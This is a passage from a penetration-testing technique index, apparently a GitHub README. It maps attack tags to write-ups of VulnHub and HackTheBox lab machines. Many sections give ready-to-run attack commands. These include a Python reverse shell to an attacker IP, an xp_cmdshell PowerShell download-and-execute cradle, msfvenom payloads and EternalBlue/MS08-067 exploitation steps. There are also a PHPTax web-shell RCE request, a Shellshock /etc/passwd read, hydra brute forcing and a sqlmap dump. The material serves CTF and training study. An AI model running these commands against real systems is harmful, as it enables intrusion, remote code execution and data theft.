| 2. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
---
<a name="exploit_php_reverseshell"></a>
#### exploit_php_reverseshell [⇡](#exploit)
use php reverse shell code with an exploit to gain interactive access on the target system
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) |
| 2. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100" /> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) |
| 3. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
| 4. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) |
| 5. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) |
| 6. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
---
<a name="exploit_php_webshell"></a>
#### exploit_php_webshell [⇡](#exploit)
use the php web shell to execute arbitrary commands and gain interactive access on the target system
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) |
---
<a name="exploit_phptax"></a>
#### exploit_phptax [⇡](#exploit)
the `Phptax 0.8` web application is vulnerable to remote code execution
```shell
GET /phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E HTTP/1.1
Host: <targetip>:<targetport>
User-Agent: Mozilla/4.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0
GET /phptax/data/rce.php?cmd=uname%20-a HTTP/1.1
Host: <targetip>:<targetport>
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100" /> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) |
[+] https://www.exploit-db.com/exploits/25849
---
<a name="exploit_prtg_sensors"></a>
#### exploit_prtg_sensors [⇡](#exploit)
execute a reverse shell command through prtg sensor creation dialog and play it to get interactive access on the target system
```shell
./46527.sh -u http://<targetip> -c "<prtg session cookie>"
psexec.py pentest@10.10.10.152
```
[+] https://www.exploit-db.com/exploits/46527
[+] https://nvd.nist.gov/vuln/detail/CVE-2018-9276
[+] https://hipotermia.pw/htb/netmon
[+] https://snowscan.io/htb-writeup-netmon/#
---
<a name="exploit_psexec_login"></a>
#### exploit_psexec_login [⇡](#exploit)
If credentials for a non-administrative user are available, we can use `psexec.py` to connect and gain interactive access to the target system.
```shell
psexec <username>@<targetip>
```
---
<a name="exploit_python_reverseshell"></a>
#### exploit_python_reverseshell [⇡](#exploit)
use a python reverse shell to gain interactive access on the target system
```shell
nc -nlvp 9999
http://<targetip>/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attackerip>",<attackerport>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) |
| 2. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100" /> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
[+] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
[+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#python-reverse-shell
---
<a name="exploit_shellshock"></a>
#### exploit_shellshock [⇡](#exploit)
```shell
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://<targetip>/cgi-bin/user.sh
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <targetip>
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf) | [htb#108](https://app.hackthebox.eu/machines/108) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png" width="100" height="100" /> | [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
[+] https://zayotic.com/posts/oscp-reference/
[+] https://highon.coffee/blog/shellshock-pen-testers-lab-walkthrough/
[+] https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/
---
<a name="exploit_smb_ms08_067"></a>
#### exploit_smb_ms08_067 [⇡](#exploit)
(netapi exploit) for microsoft windows xp systems with open smb ports, use the [ms08-067](https://github.com/andyacer/ms08_067) metasploit module [`windows/smb/ms08_067_netapi`]()
```shell
scan:
nmap -v -p 139,445 --script=smb-check-vulns --script-args=unsafe=1 <targetip>
msfcli auxiliary/scanner/smb/ms08_067_check rhosts=<targetip> threads=100 E
manual_a:
wget https://raw.githubusercontent.com/andyacer/ms08_067/master/ms08_067_2018.py
msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
nc -nlvp <attackerport>
python ms08_067_2018.py <targetip> <osid> <targetport>
manual_b:
searchsploit ms08-067
python /usr/share/exploitdb/platforms/windows/remote/7132.py <targetip> 1
msf:
use exploit/windows/smb/ms08_067_netapi
set RHOST <targetip>
set LHOST <attackerip>
show options
exploit
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Legacy](https://github.com/7h3rAm/writeups/blob/master/htb.legacy/writeup.pdf) | [htb#2](https://app.hackthebox.eu/machines/2) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/killchain.png" width="100" height="100" /> | [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067) |
[+] https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067
[+] https://github.com/andyacer/ms08_067
[+] https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py
[+] https://blog.rapid7.com/2014/02/03/new-ms08-067/
[+] https://0xdf.gitlab.io/2019/02/21/htb-legacy.html
---
<a name="exploit_smb_ms17_010"></a>
#### exploit_smb_ms17_010 [⇡](#exploit)
(eternalblue exploit) for microsoft windows system with smb v1 enbaled, use the metasploit exploit `windows/smb/ms17_010_eternalblue`
```shell
nmap -p 445 -script smb-check-vulns -script-args=unsafe=1 <targetip>
manual:
wget https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py
msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe
nc -nlvp <attackerport>
python send_and_execute.py <targetip> revshell.exe
msf:
use exploit/windows/smb/ms17_010_eternalblue
set RHOST <targetip>
set LHOST <attackerip>
show options
exploit
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Blue](https://github.com/7h3rAm/writeups/blob/master/htb.blue/writeup.pdf) | [htb#51](https://app.hackthebox.eu/machines/51) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/killchain.png" width="100" height="100" /> | [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) |
[+] https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010
[+] https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue
[+] https://0xdf.gitlab.io/2019/02/21/htb-legacy.html
[+] https://github.com/helviojunior/MS17-010/send_and_execute.py
---
<a name="exploit_smb_nullsession"></a>
#### exploit_smb_nullsession [⇡](#exploit)
smb null sessions leak a lot of sensitive information about the target system. it could be useful to access open shares or to get sensitive information
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) |
---
<a name="exploit_smb_usermap"></a>
#### exploit_smb_usermap [⇡](#exploit)
samba 3.0.0 - 3.0.25rc3 is vulnerable to remote command execution
```shell
nc -nlvp <attackerport>
sudo apt install python python-pip
pip install --user pysmb
git clone https://github.com/amriunix/CVE-2007-2447.git
cd CVE-2007-2447/
python usermap_script.py <targetip> 139 <attackerip> <attackerport>
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Lame](https://github.com/7h3rAm/writeups/blob/master/htb.lame/writeup.pdf) | [htb#1](https://app.hackthebox.eu/machines/1) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/killchain.png" width="100" height="100" /> | [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap) |
[+] https://nvd.nist.gov/vuln/detail/CVE-2007-2447
[+] https://github.com/amriunix/CVE-2007-2447
---
<a name="exploit_smb_web_root"></a>
#### exploit_smb_web_root [⇡](#exploit)
smb shared directory is mapped to the web server's root directory. read files to obtain sensitive information or upload a reverse shell file native to the web server and trigger it's execution to gain interactive access on the target system
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) |
---
<a name="exploit_sql_login"></a>
#### exploit_sql_login [⇡](#exploit)
login to the target system using a sql service account
```shell
mssqlclient.py -windows-auth "<username>@<targetip>"
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) |
---
<a name="exploit_sql_xpcmdshell"></a>
#### exploit_sql_xpcmdshell [⇡](#exploit)
use the SQL xp_cmdshell method to gain command execution on the target system
```shell
SELECT IS_SRVROLEMEMBER('sysadmin') ## check if current sql user has db sysadmin role, continue if true
EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
xp_cmdshell "whoami"
type shell.ps1 ## create a powershell reverse shell
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://<attackerip>/shell.ps1\");"
python3 -m http.server 80 ## serve the reverse shell via http
ufw allow from <targetip> proto tcp to any port 80,<attackerport> ## allow incoming connection from <targetip>
nc -nlvp <attackerport> ## listen for incoming reverse shell connection
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) |
---
<a name="exploit_sqli"></a>
#### exploit_sqli [⇡](#exploit)
target system is running a webapp that's vulnerable to sql injection
```shell
sqlmap -u "http://<targetip>:<targetport>/<vulnwebapp>/index.php" --batch --forms --dump
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [CronOS](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf) | [htb#11](https://app.hackthebox.eu/machines/11) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron) |
| 2. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) |
| 3. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) |
| 4. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) |
---
<a name="exploit_ssh_authorizedkeys"></a>
#### exploit_ssh_authorizedkeys [⇡](#exploit)
if we have access to a user's `.ssh` directory, copy our `id_rsa.pub` file to `.ssh/authorized_keys` to obtain passwordless ssh access
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) |
| 2. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) |
---
<a name="exploit_ssh_bruteforce"></a>
#### exploit_ssh_bruteforce [⇡](#exploit)
use hydra to bruteforce ssh password for a know user
```shell
hydra -l anne -P "/usr/share/wordlists/rockyou.txt" -e nsr -s 22 ssh://<targetip>
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
---
<a name="exploit_ssh_privatekeys"></a>
#### exploit_ssh_privatekeys [⇡](#exploit)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) |
---
<a name="exploit_ssl_heartbleed"></a>
#### exploit_ssl_heartbleed [⇡](#exploit)
use nmap nse script to confirm heartbleed vulnerability and then sensepost exploit to dump memory from target system
```shell
nmap --script=ssl-heartbleed -p <targetport> <targetip>
python $HOME/toolbox/scripts/heartbleed-poc/heartbleed-poc.py -n10 -f dump.bin <targetip> -p <targetport>
strings dump.bin
```
[+] https://github.com/sensepost/heartbleed-poc
---
<a name="exploit_wordpress_defaultcreds"></a>
#### exploit_wordpress_defaultcreds [⇡](#exploit)
target system has wordpress configured with default credentials `admin/admin`
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) |
---
<a name="exploit_wordpress_plugin"></a>
#### exploit_wordpress_plugin [⇡](#exploit)
certain wordpress installations might have a `/plugins/` directory that could provide source files or leak sensitive information
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
---
<a name="exploit_wordpress_plugin_activitymonitor"></a>
#### exploit_wordpress_plugin_activitymonitor [⇡](#exploit)
wordpress plugin `Plainview Activity Monitor` is vulnerable to remote command injection
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
